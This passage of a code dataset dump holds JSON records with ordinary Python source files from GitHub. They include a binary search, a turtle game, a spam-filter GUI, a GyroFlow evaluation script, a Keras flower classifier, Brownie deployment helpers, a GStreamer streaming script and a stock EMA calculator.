    \n\n\tpro = mosek_quadraticp(params)\n\n\tcode, result = pro.fit()\n\n\tif code == 0:\n\t    print(result)\n\n\nif __name__ == '__main__':\n\tmain()\n\n\n\n\n","repo_name":"youngfire/optimization_wapper","sub_path":"mosek_wrapper/mosek_quadratic.py","file_name":"mosek_quadratic.py","file_ext":"py","file_size_in_byte":6123,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"}
+{"seq_id":"20211590094","text":"def binarySearch(arr, x):\n    start = 0\n    end = len(arr) - 1  # last valid index; len(arr) would overrun\n    while start <= end:\n        mid = start + (end-start)//2\n        if x < arr[mid]:\n            end = mid - 1\n        elif x > arr[mid]:\n            start = mid + 1\n        else:\n            return True\n    return False\n\n","repo_name":"thepankj/Data-Structures-and-Algorithms","sub_path":"General/Binary Search.py","file_name":"Binary Search.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"23465699055","text":"from globals import FOODMAX, STEPMAX, WIDTH, HEIGHT, X_MAX, Y_MAX, MS_TO_QUIT, SCALE\nfrom globals import FOOD as food\n# Import our own constants\n\nfrom game_original import ghost, dobbogi, pacman\n# Import our game character classes\n\nimport turtle\nimport random\n\ndef shutDownHandler():\n    \"\"\"Outputs score and terminates the program\"\"\"\n    global score\n    print('Your score:', score)\n    window.bye()\n\ndef checkCollision(t1, t2):\n    \"\"\"Input: 2 coordinate tuples.\n    Return: True if the coordinates are sufficiently close\n    False otherwise\n    \"\"\"\n    if (abs(t1[0] - t2[0]) < 25) and (abs(t1[1] - t2[1]) < 25):\n        return True \n    return False\n    \ndef periodicTimer():\n\n    global isQuit\n    global food\n    global score # pacman's achieved score\n    turtle.tracer(0, 0) # disable screen updates\n\n\n    p_old = pm.getPosition()\n    pm.move() # move pacman\n    p_new = pm.getPosition()\n    # Check for illegal moves:\n    if (abs(p_old[0] - p_new[0]) > 12) or (abs(p_old[1] - p_new[1]) > 12):\n        print('Illegal move, game terminated.')\n        isQuit = True\n    turtle.update() # force turtle module's screen update\n    turtle.tracer(1, 10) # re-enable periodic screen updates\n    pm.decrementSteps() # pacman made one step, decrement counter\n    if pm.getRemainingSteps() == 0:\n        print('You ran out of steps!')\n        isQuit = True \n\n    pm_pos = pm.getPosition()\n\n    # check collisions pm versus food:\n    eaten_dishes = []\n    for dish in food:\n        if checkCollision(pm_pos, dish.getPosition()):\n            pm.setIsYum()\n            dish.setIsEaten()\n            eaten_dishes.append(dish)\n            score += 1\n    # Remove eaten dishes (cannot remove while iterating!):\n    for dish in eaten_dishes:\n        food.remove(dish)\n    # Check if all food has been eaten already:\n    if len(food) == 0:\n        print('Congratulations, all food collected.')\n        isQuit = True\n\n    if isQuit:\n        # Game will terminate, put the \"Game Over\" image:\n        game_over.setposition(0, -HEIGHT//2 + 22)\n        game_over.shape('game_over.gif')\n        game_over.showturtle()\n        # Trigger the shutdown handler function to be called in MS_TO_QUIT ms\n        # from now:\n        window.ontimer(shutDownHandler, MS_TO_QUIT)\n    else:\n        # Trigger the next firing of our timer function, in 90ms from now:\n        window.ontimer(periodicTimer, 90)\n\ndef RightKeyHandler():\n    \"\"\"Handler function for key-right events.\"\"\"\n    pm.turnEast()\n\ndef LeftKeyHandler():\n    \"\"\"Handler function for key-left events.\"\"\"\n    pm.turnWest()\n\ndef UpKeyHandler():\n    \"\"\"Handler function for key-up events.\"\"\"\n    pm.turnNorth()\n\ndef DownKeyHandler():\n    \"\"\"Handler function for key-down events.\"\"\"\n    pm.turnSouth()\n\ndef quitKeyHandler():\n    \"\"\"Handler function for the 'q' key.\"\"\"\n    global isQuit\n    isQuit = True\n\ndef placeFood():\n    \"\"\"Compute 
dobbogi screen positions and instantiate dobbogi objects.\n    Returns: a list of dobbogi objects.\n    \"\"\"\n    food = []\n    Upper = True\n    for i in range(0, FOODMAX):\n        ok = False\n        while not ok: # loop until proper position was computed:\n            r_x = random.randrange(-X_MAX + 20, X_MAX - 20)\n            if Upper:\n                r_y = random.randrange(160, Y_MAX)\n            else: \n                r_y = random.randrange(-Y_MAX, -40)\n            new_pos = (r_x, r_y)\n            HaveCollision = False \n            for i in food:\n                HaveCollision = HaveCollision or checkCollision(new_pos, i.getPosition()) \n            if not HaveCollision:\n                food.append(dobbogi(r_x, r_y))\n                ok = True\n        Upper = not Upper # toggle between 'above' and 'below' ghost's\n                          # screen part. \n    return food\n\n#\n# Main program\n#\nisQuit = False # Set to true to initiate game termination.\nscore = 0\nturtle.setup(WIDTH, HEIGHT)\nwindow = turtle.Screen()\nwindow.title('Dobbogi-Man')\nwindow.bgcolor('black')\n\nturtle.register_shape('yum.gif')\nturtle.register_shape('game_over.gif')\n#\npm = pacman(120, -40) # Instantiate pacman object\n#\n#\n#\nfood += placeFood()\n# Prepare the \"game over\" turtle already:\ngame_over = turtle.Turtle()\ngame_over.hideturtle()\ngame_over.speed('fastest')\n# Install the keyboard handlers:\nwindow.onkey(RightKeyHandler, 'Right')\nwindow.onkey(LeftKeyHandler, 'Left')\nwindow.onkey(UpKeyHandler, 'Up')\nwindow.onkey(DownKeyHandler, 'Down')\nwindow.onkey(quitKeyHandler, 'q')\nperiodicTimer() # Call periodic timer function for the first time.\n                # Subsequent calls will be triggered from inside\n                # this function, by setting up a timer.\n\nwindow.listen()\nwindow.mainloop()\n","repo_name":"rmdwjdrhkrkatk/Robomaster","sub_path":"vision/Control/Game/Example/main_original.py","file_name":"main_original.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"4254870459","text":"from Account import Account\nfrom Car import Car\n\n\ndef main():\n\n    car = Car(\"WFR687\", Account(name=\"Fredy Gonzales\", document=\"FG123\"))\n    print(vars(car))\n    print(vars(car.driver))\n\n\nif __name__ == \"__main__\":\n    main()","repo_name":"TheLionCoder/UberOOPCourse","sub_path":"Python/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"34857152339","text":"import dearpygui.dearpygui as dpg\nimport string\nimport nltk\n\nfrom helper.functions import categorize_words, pre_process, predict\nnltk.download('punkt')\nnltk.download('stopwords')\n\n# dearpygui expects these two args for callbacks\ndef check_spam(sender, data):\n    # clear all previous instances of result related widgets\n    try:\n        dpg.delete_item(\"result_spacer_1\")\n        dpg.delete_item(\"result_separator\")\n        dpg.delete_item(\"result_spacer_2\")\n        dpg.delete_item(\"result_text\")\n    except Exception as e:\n        # within try catch for first click in case these do not exist\n        print(e)\n\n    # get input value from the input text widget\n    input_value = dpg.get_value('Input')\n    \n    # some spacing and separator\n    dpg.add_spacing(count=6, parent=\"Primary Window\", tag=\"result_spacer_1\")\n    dpg.add_separator(parent=\"Primary Window\", tag=\"result_separator\")\n    dpg.add_spacing(count=6, parent=\"Primary Window\", tag=\"result_spacer_2\")\n    \n    # preprocess input string\n    pre_processed_input_value = pre_process(input_value)\n    \n    # get predictions\n    pred_text, pred_color = predict(pre_processed_input_value)\n    \n    # display predictions\n    
dpg.add_text(pred_text, color=pred_color, parent=\"Primary Window\", tag=\"result_text\")\n \n\n\ndpg.create_context()\n\n# loading the logo image\nwidth, height, channels, data = dpg.load_image(\"assets/logo_spamFilter.png\")\n\n# added tag to help identify this is the primary window\nwith dpg.window(label=\"Simple SMS Spam Filter\", tag=\"Primary Window\"):\n\n # displaying the image at the top\n with dpg.texture_registry(show=False):\n dpg.add_static_texture(width, height, data, tag=\"texture_tag\")\n\n # adding the image to the tag\n dpg.add_image(\"texture_tag\", indent=30)\n dpg.add_separator(label=\"separator\")\n dpg.add_spacing(count=12)\n \n # instructions\n dpg.add_text(\"Please enter an SMS message of your choice to check if it's spam or not\", color=[232, 163, 33])\n dpg.add_spacing(count=6)\n\n # add input text\n dpg.add_input_text(tag=\"Input\", label=\"Input\", width=415, default_value=\"Type Message Here!\")\n dpg.add_spacing(count=6)\n dpg.add_button(label=\"Check\", callback=check_spam)\n\n \n\ndpg.create_viewport(title=\"Simple SMS Spam Filter\", width=540, height=720)\n\ndpg.setup_dearpygui()\ndpg.show_viewport()\ndpg.set_primary_window(\"Primary Window\", True)\ndpg.start_dearpygui()\ndpg.destroy_context()","repo_name":"Nachimak28/sms_spam_filter_gui","sub_path":"spam_sms_identifier/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"25888923766","text":"import os\nimport json\nimport logging\nimport argparse\n\nimport megengine.distributed as dist\nimport megengine.functional as F\n\nimport model.net as net\nimport dataset.data_loader as data_loader\n\nfrom easydict import EasyDict\n\nfrom common import utils\nfrom common.manager import Manager\nfrom loss.losses import compute_losses, compute_metrics\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--model_dir', default='experiments/base_model', help=\"Directory containing params.json\")\nparser.add_argument('--restore_file', default='best', help=\"name of the file in --model_dir containing weights to load\")\n\n\ndef evaluate(model, manager):\n rank = dist.get_rank()\n world_size = dist.get_world_size()\n\n # set model to evaluation mode\n model.eval()\n\n # compute metrics over the dataset\n if manager.dataloaders[\"val\"] is not None:\n # loss status and val status initial\n manager.reset_loss_status()\n manager.reset_metric_status(\"val\")\n for data_batch in manager.dataloaders[\"val\"]:\n # compute the real batch size\n bs = data_batch[\"img1\"].shape[0]\n # move to GPU if available\n data_batch = utils.tensor_mge(data_batch)\n\n data_batch[\"imgs\"] = F.concat([data_batch[\"img1\"] / 255.0, data_batch[\"img2\"] / 255.0], 1)\n # compute model output\n output_batch = model(data_batch)\n # compute all loss on this batch\n # loss = compute_losses(data_batch, output_batch, manager.params)\n metrics = {}\n metrics[\"EPE\"] = compute_metrics(data_batch, output_batch)\n if world_size > 1:\n # loss['total'] = F.distributed.all_reduce_sum(loss['total']) / world_size\n metrics['EPE'] = F.distributed.all_reduce_sum(metrics['EPE']) / world_size\n # manager.update_loss_status(loss, \"val\", bs)\n # compute all metrics on this batch\n\n manager.update_metric_status(metrics, \"val\", bs)\n # manager.print_metrics(\"val\", title=\"Val\", color=\"green\")\n\n # update data to tensorboard\n if rank == 0:\n # manager.writer.add_scalar(\"Loss/val\", manager.loss_status[\"total\"].avg, 
manager.epoch)\n # manager.logger.info(\"Loss/valid epoch {}: {}\".format(manager.epoch, manager.loss_status['total'].avg))\n\n for k, v in manager.val_status.items():\n manager.writer.add_scalar(\"Metric/val/{}\".format(k), v.avg, manager.epoch)\n # manager.logger.info(\"Metric/valid epoch {}: {}\".format(manager.epoch, v.avg))\n # For each epoch, print the metric\n manager.print_metrics(\"val\", title=\"Val\", color=\"green\")\n\n\ndef test(model, manager):\n # set model to evaluation mode\n model.eval()\n\n if manager.dataloaders[\"test\"] is not None:\n # loss status and test status initial\n manager.reset_loss_status()\n manager.reset_metric_status(\"test\")\n for data_batch in manager.dataloaders[\"test\"]:\n # compute the real batch size\n bs = data_batch[\"img1\"].shape[0]\n # move to GPU if available\n data_batch = utils.tensor_mge(data_batch)\n data_batch[\"imgs\"] = F.concat([data_batch[\"img1\"], data_batch[\"img2\"]], 1)\n # compute model output\n output_batch = model(data_batch)\n # compute all metrics on this batch\n metrics = {}\n\n # identity_batch = {\"flow_fw\": [F.zeros_like(data_batch[\"gyro_field\"])]}\n # metrics[\"I33\"] = compute_metrics(data_batch, identity_batch)\n\n # gyro_batch = {\"flow_fw\": [data_batch[\"gyro_field\"]]}\n # metrics[\"GyroField\"] = compute_metrics(data_batch, gyro_batch)\n\n metrics[\"EPE\"] = compute_metrics(data_batch, output_batch)\n\n if data_batch[\"label\"][0] == \"RE\":\n metrics[\"RE\"] = compute_metrics(data_batch, output_batch)\n elif data_batch[\"label\"][0] == \"Rain\":\n metrics[\"Rain\"] = compute_metrics(data_batch, output_batch)\n elif data_batch[\"label\"][0] == \"Dark\":\n metrics[\"Dark\"] = compute_metrics(data_batch, output_batch)\n elif data_batch[\"label\"][0] == \"Fog\":\n metrics[\"Fog\"] = compute_metrics(data_batch, output_batch)\n\n manager.update_metric_status(metrics, \"test\", bs)\n\n manager.print_metrics(\"test\", title=\"Test\", color=\"red\")\n\n # For each epoch, print the metric\n print(\"The average results are: \")\n manager.print_metrics(\"test\", title=\"Test\", color=\"red\")\n\n\nif __name__ == '__main__':\n # Load the parameters\n args = parser.parse_args()\n json_path = os.path.join(args.model_dir, 'params.json')\n assert os.path.isfile(json_path), \"No json configuration file found at {}\".format(json_path)\n with open(json_path) as f:\n params = EasyDict(json.load(f))\n # Only load model weights\n params.only_weights = True\n\n # Update args into params\n params.update(vars(args))\n\n # Get the logger\n logger = utils.set_logger(os.path.join(args.model_dir, 'evaluate.log'))\n\n # Create the input data pipeline\n logging.info(\"Creating the dataset...\")\n\n # Fetch dataloaders\n params.eval_type = 'test'\n dataloaders = data_loader.fetch_dataloader(params)\n\n # Define the model and optimizer\n model = net.fetch_net(params)\n\n # Initial status for checkpoint manager\n manager = Manager(model=model, optimizer=None, scheduler=None, params=params, dataloaders=dataloaders, writer=None, logger=logger)\n\n # Reload weights from the saved file\n manager.load_checkpoints()\n\n # Test the model\n logger.info(\"Starting test\")\n\n # Evaluate\n test(model, manager)\n","repo_name":"MegEngine/GyroFlow","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":5732,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"27"} +{"seq_id":"20471712993","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, 
next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def pairSum(self, head: Optional[ListNode]) -> int:\n lst = []\n while head:\n lst.append(head.val)\n head = head.next\n \n return max([lst[i]+lst[-1-i] for i in range(len(lst))])","repo_name":"seogudwns/LeetCode","sub_path":"2130-maximum-twin-sum-of-a-linked-list/2130-maximum-twin-sum-of-a-linked-list.py","file_name":"2130-maximum-twin-sum-of-a-linked-list.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"75045599750","text":"#!/usr/bin/env python\n\nimport crrlpy.models.rrlmod as rm\nimport pylab as plt\n\nsalg = rm.load_betabn('7d1', '1d0', other='')\ndata = rm.make_betabn('7d1', '1d0', 'alpha', nmax=1000, other='')\n\nplt.plot(salg[100:1000,0], salg[100:1000,1], 'b-')\nplt.plot(data[0,100:1000], data[1,100:1000], 'ro')\n\nplt.show()","repo_name":"astrofle/CRRLpy","sub_path":"crrlpy/models/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"29395435609","text":"from __future__ import absolute_import, division, print_function\nimport importlib\n# TensorFlow and tf.keras\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom keras.callbacks import TensorBoard\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPool2D\n# Helper libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport atexit\nimport argparse\nimport os\nimport sys\nimport logging\nimport importlib.util\nspec = importlib.util.spec_from_file_location(\"module.name\", \"model.py\")\nModel = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(Model)\n\nrun_title = ''\n\nparser = argparse.ArgumentParser(description='Train on flower images ')\nparser.add_argument(\n '--run_title', '-rt',\n default='none',\n help='Provide a run name. 
If omitted, run data is stored as none'\n)\nparser.add_argument(\n    '--batch_size', '-bs',\n    default=4,\n    help='Provide a batch_size, defaults to 4'\n)\nparser.add_argument(\n    '--load_model', '-lm',\n    default='none',\n    help='Load the model from its file path'\n)\nparser.add_argument(\n    '--tf_logs', '-tfl',\n    default='false',\n    help='Set true/yes to show TensorFlow warning/error logs, false/no to hide them'\n)\nargs = parser.parse_args()\n\nlogging.getLogger('tensorflow').disabled = args.tf_logs.lower() not in ('true', 'yes')\n\n# Local time in form yyyy-mm-dd-hh-mm-ss\nlt = time.localtime(time.time())\nlocaltime = [lt[1],lt[2] , lt[3] , lt[4] , lt[5]]\nlocaltime = ['{:02d}'.format(a) for a in localtime]\nlocaltime = str(lt[0]) + '-' + ('-').join(localtime)\nprint(\"Local Time: \", localtime)\ndel lt\n\nlogpath = \"json-logs/log-\" + localtime +\".json\"\n\n# Keras callback that appends each epoch's metrics to a JSON log file named at startup.\n# The file always holds a valid JSON array: each epoch strips the trailing ']', appends\n# one record, and restores it.\nclass writeToJson(tf.keras.callbacks.Callback):\n    def __init__(self):\n        self.history = dict(loss=[],val_loss=[],acc=[],val_acc=[])\n        f=open(logpath,\"w+\")\n        f.write(\"[]\")\n        f.close()\n        self.epochNum = 0\n    def on_epoch_end(self, epoch, logs={}):\n        self.epochNum += 1\n        for key in self.history:\n            self.history[key] = logs.get(key)\n        with open(logpath, \"a\") as f:\n            size=f.tell()\n            f.truncate(size-1)\n            #f=open(self.logpath,\"a+\")\n            if f.tell() > 2:\n                f.write(\",\")\n            f.write(\"{\\\"loss\\\":\\\"%f\\\",\\\"val_loss\\\":\\\"%f\\\",\\\"acc\\\":\\\"%f\\\",\\\"val_acc\\\":\\\"%f\\\"}\" % (logs.get('loss'),logs.get('val_loss'),logs.get('acc'),logs.get('val_acc')))\n            f.write(\"]\")\n            f.close()\nwrite_to_json = writeToJson()\n\n# Handle preemptive closes\ndef closeJsonLog():\n    f= open(logpath,\"a+\")\n    size=f.tell()\n    if size > 2:\n        f.truncate(size-1)\n        f.write(\"]\")\n    f.close()\natexit.register(closeJsonLog)\n\n# Training Function\ndef train():\n    # Data Augmentation, provides more varied data for model to train on, preventing overfitting\n    datagen = keras.preprocessing.image.ImageDataGenerator(\n        rescale=1/255,\n        validation_split=0.2,\n        rotation_range=10,\n        width_shift_range=0.1,\n        height_shift_range=0.1,\n        horizontal_flip=True)\n    batch_size = int(args.batch_size)\n    print(\"Loading Training Dataset\")\n    tsize = 1\n    X_train = datagen.flow_from_directory('flower_photos/', class_mode='categorical', batch_size=batch_size,target_size=(tsize,tsize), subset='training', seed=2)\n    print(\"Loading Validation Dataset\")\n    X_val = datagen.flow_from_directory('flower_photos/', class_mode='categorical', batch_size=batch_size,target_size=(tsize, tsize), subset='validation', seed=2)\n\n\n    labels = (X_train.class_indices)\n    print(\"Labels\", labels)\n    print(\"Input Shape\", X_train[0][0].shape)\n\n    # OTHERS\n    filepath = \"models-v0/2cnnmodel-{epoch:02d}-{val_acc:.5f}.hdf5\"\n    check_point = tf.keras.callbacks.ModelCheckpoint(filepath, monitor='val_loss', verbose=0, save_best_only=False, save_weights_only=False, mode='auto', period=2)\n\n    optimizer = tf.keras.optimizers.RMSprop(lr=0.001, rho=0.9, epsilon=1e-08, decay=0.0)\n    red_lr = tf.keras.callbacks.ReduceLROnPlateau(monitor='val_acc',patience=3,verbose=1,factor=0.2)\n\n    # TENSORBOARD LOGGING\n    logdir = 'logs/' + args.run_title\n    tensorboard_callback = keras.callbacks.TensorBoard(log_dir=logdir)\n\n    # ARCHITECTURE\n    model = Model.unitTestModel()\n\n    History = model.fit_generator(\n        X_train,\n        steps_per_epoch=len(X_train)//4,  # integer number of batches\n        validation_data = X_val,\n        epochs=200,\n        
callbacks=[check_point,red_lr,write_to_json,tensorboard_callback])\n    plt.plot(History.history['loss'])\n    plt.plot(History.history['val_loss'])\n    plt.title('Model Loss')\n    plt.ylabel('Loss')\n    plt.xlabel('Epochs')\n    plt.legend(['train', 'val'])\n    #plt.show()\n\n    plt.plot(History.history['acc'])\n    plt.plot(History.history['val_acc'])\n    plt.title('Model Accuracy')\n    plt.ylabel('Accuracy')\n    plt.xlabel('Epochs')\n    plt.legend(['train', 'val'])\n    model.save('2xcnnmodel-flowersv0.h5')\n####-----####\nif __name__ == '__main__':\n    train()\n","repo_name":"StoneT2000/Practice","sub_path":"Python/ML/Neural Networks/FlowerClassification/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"12779647239","text":"import sys\nfrom collections import deque\nsys.stdin = open('curiculum', 'r')\nv = int(input())\ntimes = [0]*(v+1)\nmxCnt = [0] * (v + 1)\nindegree = [0]*(v+1)\ngraph = [[] for _ in range(v+1)]\n\nfor i in range(1, v + 1):\n    lst = list(map(int, input().split()))\n    first = lst.pop(0)\n    if first == -1:\n        continue\n    else:\n        times[i] = first\n    for data in lst:\n        if data == -1:\n            break\n        else:\n            indegree[i] += 1\n            graph[data].append(i)\nprint('ind', indegree)\n\nfor i in range(v+1):\n    mxCnt[i] = times[i]\n\ndef topology_sort():\n    edges = deque()\n    for i in range(1, v+1):\n        if indegree[i] == 0:\n            edges.append(i)\n    # pre = 0\n    while edges:\n        now = edges.popleft()\n        # result.append(times[now] + pre)\n        # pre = times[now]\n        for i in graph[now]:\n            mxCnt[i] = max(mxCnt[i], mxCnt[now] + times[i])\n            indegree[i] -= 1\n            if indegree[i] == 0:\n                edges.append(i)\n\n\ntopology_sort()\n# print('ind', indegree)\nprint('times', times)\nprint('graph', graph)\nprint(mxCnt)\n\n","repo_name":"ggaem97/study","sub_path":"2022-01-10/curicul.py","file_name":"curicul.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"7697884851","text":"# define input data\nprint(\"Ejercicio 17\")\n# input data\npaqueteA=\"A: 1 television, 1 stereo, 3 pairs of shoes, 5 shirts and 5 pants\"\npaqueteB=\"B: 1 recorder, 3 pairs of shoes, 5 shirts and 5 pants\"\npaqueteC=\"C: 2 pairs of shoes, 3 shirts and 3 pants\"\npaqueteD=\"D: 1 pair of shoes, 2 shirts and 3 pairs of pants\"\nTrecibido= int(input(\"December is here, enter the amount you received:\"))\nif Trecibido >= 50000 :\n    podracomprar = paqueteA\nelif Trecibido <50000 and Trecibido >= 20000 :\n    podracomprar = paqueteB\nelif Trecibido <20000 and Trecibido >= 10000 :\n    podracomprar = paqueteC\nelif Trecibido <10000 :\n    podracomprar = paqueteD\nprint(\"You will be able to buy package
\", podracomprar)","repo_name":"hubert-cyber/EjerciciosEnPython","sub_path":"Ejercicio17.py","file_name":"Ejercicio17.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"43687195890","text":"import sys\nsys.stdin = open(\"input.txt\", \"r\")\nfor i in range(1, 2):\n\n    n, pw = map(int, input().split())\n    pw = str(pw)\n    stack = [pw[0]]\n\n    for j in range(1, len(pw)):\n        if len(stack) and stack[-1] == pw[j]:\n            stack.pop()\n        else:\n            stack.append(pw[j])\n\n    print(f\"#{i} {int(''.join(stack))}\")\n","repo_name":"bmlsj/Solve-algorithms","sub_path":"SWEA/SW 문제해결 기본/[10DAY]1234.비밀번호.py","file_name":"[10DAY]1234.비밀번호.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"33305719133","text":"from brownie import accounts, network, config, MockV3Aggregator\nfrom web3 import Web3\n\n\nFORKED_LOCAL_ENVIRONMENTS = [\"mainnet-fork-dev\"]\n\nLOCAL_BLOCKCHAIN_ENVIRONMENTS = [\"development\", \"ganache-local\", \"ganache-local_bis\"]\n\nPRIVATE_BLOCKCHAIN_ENVIRONMENTS = [\"Hmz-private-chain\"]\n\nDECIMALS = 10\n\nSTARTING_PRICE = 4000\n\n\ndef get_account():\n    if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n        # print(*accounts)\n        return accounts[0]\n    elif network.show_active() in PRIVATE_BLOCKCHAIN_ENVIRONMENTS:\n        return accounts.add(config[\"wallets\"][\"from_key\"])\n    return accounts.add(config[\"wallets\"][\"from_key\"])\n\n\ndef get_pricefeed():\n    if network.show_active() in FORKED_LOCAL_ENVIRONMENTS:\n        price_feed_address = config[\"networks\"][network.show_active()][\n            \"eth_usd_price_feed\"\n        ]\n        return price_feed_address\n    print(\"Deploying Mocks...\")\n    account = get_account()\n    if len(MockV3Aggregator) <= 0:\n        mock_aggregator = MockV3Aggregator.deploy(\n            DECIMALS, Web3.toWei(STARTING_PRICE, \"ether\"), {\"from\": account}\n        )\n        print(\"Mocks Deployed!\")\n    price_feed_address = MockV3Aggregator[\n        -1\n    ].address  # Contract[-1] gets the latest deployed version of a contract\n    return price_feed_address\n","repo_name":"HamzaKarh/betting_game","sub_path":"scripts/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"72623023113","text":"import cv2\n\n# WORKING: cap = cv2.VideoCapture(\"shmsrc socket-path=/tmp/foo ! video/x-raw, format=BGR ,width=1920,height=1080,framerate=30/1 ! videoconvert ! video/x-raw, format=BGR ! appsink\")\n\nfps = 30.\nframe_width = 1920\nframe_height = 1080\n\n# Define the source as shared memory (shmsrc) and point to the socket.\n# Set the caps (raw, i.e. not encoded, video/x-raw frames in BGR, the format OpenCV grabs) and the camera properties.\n# Then sink the grabbed data to the appsink.\ncap = cv2.VideoCapture(\"shmsrc socket-path=/tmp/foo ! video/x-raw, format=BGR ,width=1920,height=1080,framerate=30/1 ! appsink\")\n\nif not cap.isOpened():\n    print(\"Cannot capture from camera. Exiting.\")\n    quit()\n\n\ngst_str_rtp = \"appsrc ! videoconvert ! x264enc noise-reduction=10000 tune=zerolatency byte-stream=true threads=4 \" \\\n              \" ! h264parse ! mpegtsmux ! rtpmp2tpay ! 
udpsink host=127.0.0.1 port=5000\"\n\n# Create a VideoWriter that pushes frames to an RTP sink\nout = cv2.VideoWriter(gst_str_rtp, 0, fps, (frame_width, frame_height), True)\n\nwhile True:\n\n    ret, frame = cap.read()\n    #\n    if not ret:\n        break\n\n    out.write(frame)\n\n\n    cv2.imshow(\"SHM frame\",frame)\n    if cv2.waitKey(1) & 0xFF == ord('q'):\n        break\n\n# gst-launch-1.0 v4l2src ! x264enc ! shmsink socket-path=/tmp/foo sync=true wait-for-connection=false shm-size=10000000\n\n# gst-launch-1.0 shmsrc socket-path=/tmp/foo ! h264parse ! avdec_h264 ! videoconvert ! ximagesink\n\n# gst-launch-1.0 shmsrc socket-path=/tmp/foo ! video/x-raw, format=BGR ,width=1920,height=1080,framerate=30/1 ! videoconvert ! ximagesink\n","repo_name":"mad4ms/python-opencv-gstreamer-examples","sub_path":"gst_shm_to_rtp.py","file_name":"gst_shm_to_rtp.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":325,"dataset":"github-code","pt":"27"}
+{"seq_id":"6870257845","text":"#!/usr/local/bin/python3\n\n# Formula for the N-day exponential moving average:\n# EMA = (today's close * 2 + previous day's EMA * (N-1)) / (N+1)\n# 1. ./calculateMetrics.py [ -i inputStock -o outputFolder -f ]\n#    EMA21, EMA60, EMA200\n#    STD21, STD60, STD200\n#    VAR21, VAR60, VAR200\n#    (the std/var for the first N-1 days is marked as 0)\n# \n# 2. ./pickStockByDate -d 20001030 => stocks_date.csv\n#\n# 3. selecting stocks => output stocks_data.csv\n\n\n\nimport math\nimport optparse\nimport os\nimport shutil\n\nimport metricsIo\nimport buffedCalculate\nimport utility\n\ndef calculateStdVar(closeList, varN):\n    if len(closeList) < varN:\n        return []\n\n    buffer = closeList[:varN]\n    resultStd = [0] * (varN-1)\n    resultVar = [0] * (varN-1)\n\n    calculator = buffedCalculate.Calculator(buffer)\n    resultStd.append(calculator.getStdDeviation())\n    resultVar.append(calculator.getVariance())\n\n    i = varN\n    while i < len(closeList):\n        buffer.pop(0)\n        buffer.append(closeList[i])\n        calculator = buffedCalculate.Calculator(buffer)\n        resultStd.append(calculator.getStdDeviation())\n        resultVar.append(calculator.getVariance())\n        i += 1\n\n    return [resultStd, resultVar]\n\n\ndef calculateEma(closeList, emaN):\n    if len(closeList) < 1:\n        return []  # warning reported in csvio\n    assert(emaN > 1)\n\n    resultList = [closeList[0]]\n\n    i = 1\n    while i < len(closeList):\n        ema = (closeList[i] * 2 + resultList[i-1] * (emaN-1) ) / (emaN + 1)\n        resultList.append(ema)\n        i += 1\n\n    return resultList\n
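# A quick sanity check of the recurrence above (hand-worked, not from the\n# original repo): with emaN = 3 and closes [10, 11, 12], the seed is 10, then\n# (11*2 + 10*2) / 4 = 10.5, then (12*2 + 10.5*2) / 4 = 11.25.\n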
    \n\nratioNumberList = [21, 60, 200]\nvarNumberList = [21, 60, 200]\ntitleList = ['date', 'open', 'high', 'low', 'close', 'volume', 'turnover']\ndef runOnStock(stockFile, outputFolderName):\n    if not stockFile.endswith('.txt'):\n        return\n\n    inputFileName = os.path.basename(os.path.normpath(stockFile)).replace('.txt', '')\n    outputFileName = os.path.join(outputFolderName, inputFileName)\n\n    readObject = metricsIo.Reader(stockFile)\n    emaList = []\n    stdList = []\n    varList = []\n\n    for ratioN in ratioNumberList:\n        emaResult = calculateEma(readObject.getCloseList(), ratioN)\n        if len(emaResult) == 0:\n            #print('Warning: ema calculation error for file \\'{}\\''.format(stockFile))\n            return  # calculation error, abort for this file\n\n        stdVarResult = calculateStdVar(readObject.getCloseList(), ratioN)\n        if len(stdVarResult) != 2 or len(stdVarResult[0]) == 0 or len(stdVarResult[1]) == 0:\n            #print('Warning: std/var calculation error for file \\'{}\\''.format(stockFile))\n            return  # calculation error, abort for this file\n\n        emaList.append(emaResult)\n        